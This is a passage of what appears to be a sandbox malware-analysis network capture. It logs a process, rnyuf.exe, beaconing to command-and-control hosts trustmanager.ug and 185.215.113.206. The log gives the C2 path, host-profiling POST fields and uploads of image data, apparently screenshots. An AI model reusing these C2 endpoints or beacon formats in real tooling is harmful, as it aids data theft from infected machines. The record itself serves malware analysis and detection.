Aug 23, 2021 02:09:00.215706110 CEST	15615	OUT	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
Aug 23, 2021 02:09:00.216156006 CEST	15618	OUT	Data Raw: fc b8 7d 9b c9 ce ef 61 bb 38 fc 36 fb d7 05 6e 78 a7 24 df de ff 00 c9 7e 67 55 3e 56 d2 b2 fc 3f cc f9 57 53 55 4d 4a 50 a0 01 90 70 3e 82 aa 55 cd 57 fe 42 53 7e 1f c8 55 3c 57 44 be 26 73 2d 84 a5 a5 a5 34 80 6d 14 b4 b8 a0 06 f6 a5 c5 3b 14 Data Ascii: }a86nx$~gU>V?WSUMJPp>UWBS~U<WD&s-4m;b1KN&(1K)h(bSEv1@;EE%bRPbbPRQv((PF)h4} wLT!Z,;SIVb\mbIv(SIV
Aug 23, 2021 02:09:00.241086006 CEST	15629	OUT	Data Raw: 96 28 a1 96 48 a4 48 e6 52 d1 3b 29 02 40 09 04 a9 ee 32 08 e3 b8 ac 29 50 a7 4a 72 94 34 6f 7f c4 b9 d4 9c e2 94 ba 11 d1 56 ae 34 db fb 48 9e 5b 9b 1b 98 63 49 8c 0e f2 42 ca 16 40 32 50 92 38 6c 73 8e b4 eb 6d 23 53 bc fb 3f d9 74 db c9 fe d2 Data Ascii: (HHR;)@2)PJr4oV4H[cIB@2P8lsm#S?tyP3, rq"KVn4BP}UEKtH=o*[67Vs#b`84]VZ$IN^4}BVd{D__k]Mq!{Ic-AuV2yo$d
Aug 23, 2021 02:09:00.241122007 CEST	15634	OUT	Data Raw: 6e 73 8c ef c6 58 1e bc e2 bc e2 0d 5f 55 b5 6b 43 6d 7c f0 9b 48 24 b7 80 c6 00 29 1c 9b 8b 8c e3 9c ef 6e 4f 23 3c 74 14 c5 d4 b5 24 b0 5b 15 bb c5 a8 b5 6b 41 1f 96 bf ea 9a 4f 34 ae 71 9f bf ce 7a f6 e9 c5 29 52 a9 b2 da ef f5 5f e5 f8 8d 54 Data Ascii: nsX_UkCm\|H$)nO#<t$[kAO4qz)R_T{/Yi[2jCcxg=[:vqFoH3k[2[WN3{f][VioK.f*U9cb97w7:>w1y<%)-?~mWd+5j
Aug 23, 2021 02:09:00.241132021 CEST	15637	OUT	Data Raw: 03 03 f4 a9 6d 2e a6 b2 ba 8e e6 06 db 24 67 20 f6 f7 07 d4 11 c1 15 ed cb 2e a4 e9 72 75 bd ef fd 74 3c 28 e6 35 55 5e 7e 96 b5 bf ae a7 b6 5a 6b 76 fa fc 3e 1f be 83 00 b5 e3 2c 91 e7 25 1c 5b cd 91 fe 7b 57 8b 7c 67 ff 00 92 87 37 fd 7b 45 fc Data Ascii: m.$g .rut<(5U^~Zkv>,%[{W\|g7{EdI$@? fPxPT1k~Wuo{QA )hBIESs@rl<RE.iZZniAisLh/zu\@4)V$PwsN8vUSd&
Aug 23, 2021 02:09:00.241398096 CEST	15638	OUT	Data Raw: d8 aa b9 a3 34 bd 9c 46 58 37 72 f7 6c fd 4d 1f 6b 97 1f 7b 1f 41 55 b3 4b 4f 92 3d 83 62 c1 b9 95 87 32 31 fc 69 a6 46 6e ac 4f d6 a3 a2 8e 48 f6 0b b2 55 72 0e 6b a5 bd bc 78 be 1a b7 cd cb cf b7 f0 ae 5f a0 ad 5d 62 5c 7c 3e 86 3f 5b 93 5c 38 Data Ascii: 4FX7rlMk{AUKO=b21iFnOHUrkx_]b\\|>?[\8'w`%iK)bCM:zj<vS@P7,IV~\2y>oH4k+}Xo`9*>i":L\W:DC IF#NmmdLgl[Z=)C
Aug 23, 2021 02:09:00.241561890 CEST	15645	OUT	Data Raw: a0 9f a0 1e b9 c3 9a ad bf ae df e6 6f cb 4a fb ff 00 57 ff 00 22 be ad 6d a4 ae 91 fd a9 a4 bd e1 b6 93 53 9a d2 11 72 ca 58 c4 89 19 0c 70 a3 e6 25 c9 fa 60 76 c9 d8 d5 7c 3d a5 e9 6b ac 32 45 a9 5f ad 95 ec b6 ce 6d a5 4d d6 48 a0 6c 92 65 d8 Data Ascii: oJW"mSrXp%`v\|=k2E_mMHleK+yFrxWc:}wqv.xIuvWRYx-{v}6iuE;~K(x?l/Wo.i10:<HTU=M^<9aZYi]Aen\|#x
Aug 23, 2021 02:09:00.266731024 CEST	15651	OUT	Data Raw: c1 35 d7 1d 06 c2 4f b9 2e 3f 1a 85 fc 30 a7 fd 5c c0 d5 7d 76 9b dc 4f 2c ac b6 39 9e 69 c0 1a dd 7f 0d dc af dd 21 aa bb e8 97 89 ff 00 2c b3 f4 aa 58 9a 6f 66 43 c1 56 8e e8 cc 5e b8 a7 e2 ac b6 9f 70 9d 61 61 f8 53 0c 32 0e a8 47 e1 55 ed 22 Data Ascii: 5O.?0\}vO,9i!,XofCV^paaS2GU"b3[03R6JhJ-Sr@)@e()SK- G]G5 v=4\G:g4Qp:P(u'zZ(AE-u_%ga[HmzS<aq
Aug 23, 2021 02:09:00.266783953 CEST	15656	OUT	Data Raw: 44 f2 b2 5a 51 51 07 1e b4 ed e3 d6 aa e8 56 63 e8 c5 37 78 f5 a3 78 f5 a7 74 2b 31 69 0f 5a 6e f1 9e b4 16 1e b5 37 43 b3 16 8a 66 e1 eb 46 f0 68 ba 1d 98 fa 51 4c dc 3d 69 41 1e b4 5d 0a cc 7d 14 99 1e b4 64 7a d3 ba 15 87 51 8a 68 23 d6 82 c3 Data Ascii: DZQQVc7xxt+1iZn7CfFhQL=iA]}dzQh#XqFi]J&Lw&ER3@<RAL4` K( SbE#-6)MQ,x4i!8SDL#J1jA%-&h&E&iE)*
Aug 23, 2021 02:09:00.318854094 CEST	15703	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:00.318881989 CEST	15703	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
46	192.168.2.3	49771	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:00.215434074 CEST	15605	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:00.241421938 CEST	15640	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:00.241446972 CEST	15640	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
47	192.168.2.3	49774	185.206.180.136	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:00.379502058 CEST	15704	OUT	POST /k8FppT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: trustmanager.ug Content-Length: 82 Cache-Control: no-cache Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 32 66 32 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 34 34 30 36 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b2f25&os=1&bi=1&ar=1&pc=124406&un=user&dm=&av=13&lv=0
Aug 23, 2021 02:09:00.405405998 CEST	15707	IN	HTTP/1.1 200 OK Server: nginx Date: Mon, 23 Aug 2021 00:09:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 63 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 74 65 6d 70 6c 61 74 65 73 2f 32 2f 73 74 79 6c 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 61 66 66 2f 69 64 2f 35 36 32 33 39 36 2f 22 20 74 69 74 6c 65 3d 22 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 20 61 6e 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 73 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 69 6d 61 67 65 73 2f 6c 6f 67 6f 2f 6c 6f 67 6f 2d 62 6c 61 63 6b 2d 6e 65 74 2d 31 35 30 78 31 35 30 2e 70 6e 67 22 20 61 6c 74 3d 22 63 6c 6f 75 64 6e 73 2e 6e 65 74 3a 20 46 72 65 65 20 44 4e 53 20 68 6f 73 74 69 6e 67 22 20 2f 3e 3c 2f 61 3e 0a 09 09 09 09 3c 64 69 76 3e 0a 09 09 09 09 09 3c 68 31 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 66 66 61 39 30 30 3b 22 3e 74 72 75 73 74 6d 61 6e 61 67 65 72 2e 75 67 3c 2f 68 31 3e 0a 09 09 09 09 09 3c 68 32 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 66 6f 72 20 6f 6e 65 20 6f 66 20 6f 75 72 20 63 75 73 74 6f 6d 65 72 73 2e 3c 2f 68 32 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 44 6f 6d 61 69 6e 20 70 61 72 6b 69 6e 67 20 73 65 72 76 69 63 65 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 44 4e 53 3c 2f 61 3e 20 2d 20 46 72 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 44 4e 53 20 68 6f 73 74 69 6e 67 3c 2f 61 3e 20 61 6e 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 6e 73 2e 6e 65 74 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 Data Ascii: 4ca<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title></title><meta name="keywords" content="" /><meta name="description" content="" /><meta http-equiv="content-type" content="text/html; charset=utf-8" /><link href="/templates/2/style.css" rel="stylesheet" /><title>trustmanager.ug</title><script src="/js/jquery.min.js" type="text/javascript"></script></head><body><div class="container"><div class="content"><a href="https://www.cloudns.net/aff/id/562396/" title="Free DNS hosting and Domain names" target="_blank"><img src="https://www.cloudns.net/images/logo/logo-black-net-150x150.png" alt="cloudns.net: Free DNS hosting" /></a><div><h1 style="color: #ffa900;">trustmanager.ug</h1><h2>This domain is registered for one of our customers.</h2></div></div>Domain parking service by <a href="https://www.cloudns.net/" target="_blank">ClouDNS</a> - Free <a href="https://www.cloudns.net/" target="_blank">DNS hosting</a> and <a href="https://www.cloudns.net/" target="_bla
Aug 23, 2021 02:09:00.405424118 CEST	15707	IN	Data Raw: 6e 6b 22 3e 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 3c 2f 61 3e 20 70 72 6f 76 69 64 65 72 2e 0a 09 09 3c 2f 64 69 76 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: nk">domain names</a> provider.</div></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
48	192.168.2.3	49773	185.215.113.206	80	C:\Users\user\AppData\Local\Temp\bd1299733e\rnyuf.exe

Timestamp	kBytes transferred	Direction	Data
Aug 23, 2021 02:09:00.419953108 CEST	15707	OUT	POST /k8FppT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----40b0eb3d52330030f6bb67b3bee306cb Host: 185.215.113.206 Content-Length: 93529 Cache-Control: no-cache
